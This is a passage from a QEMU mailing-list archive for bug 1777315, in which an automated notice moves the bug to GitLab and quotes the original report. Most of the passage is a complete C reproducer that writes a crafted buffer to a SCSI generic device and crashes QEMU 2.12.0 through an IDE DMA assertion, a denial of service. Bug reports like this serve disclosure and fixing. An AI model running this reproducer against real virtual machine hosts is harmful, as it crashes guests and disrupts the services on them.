buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
* [Bug 1777315] Re: IDE short PRDT abort
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
` (7 preceding siblings ...)
2020-07-28 1:30 ` [Bug 1777315] Re: IDE short PRDT abort John Snow
@ 2021-04-30 16:57 ` Thomas Huth
8 siblings, 0 replies; 10+ messages in thread
From: Thomas Huth @ 2021-04-30 16:57 UTC (permalink / raw)
To: qemu-devel
This is an automated cleanup. This bug report has been moved
to QEMU's new bug tracker on gitlab.com and thus gets marked
as 'expired' now. Please continue with the discussion here:
https://gitlab.com/qemu-project/qemu/-/issues/57
** Changed in: qemu
Status: In Progress => Expired
** Changed in: qemu
Assignee: John Snow (jnsnow) => (unassigned)
** Bug watch added: gitlab.com/qemu-project/qemu/-/issues #57
https://gitlab.com/qemu-project/qemu/-/issues/57
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
IDE short PRDT abort
Status in QEMU:
Expired
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
end of thread, other threads:[~2021-04-30 17:27 UTC | newest]
Thread overview: 10+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
2018-06-17 11:48 ` [Qemu-devel] [Bug 1777315] " icytxw
2018-06-18 5:52 ` Thomas Huth
2018-06-18 6:17 ` icytxw
2018-06-18 18:10 ` Amol Surati
2018-06-19 13:55 ` John Snow
2019-05-06 16:26 ` Marco Elver
2020-07-11 19:08 ` Alexander Bulekov
2020-07-28 1:30 ` [Bug 1777315] Re: IDE short PRDT abort John Snow
2021-04-30 16:57 ` Thomas Huth
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.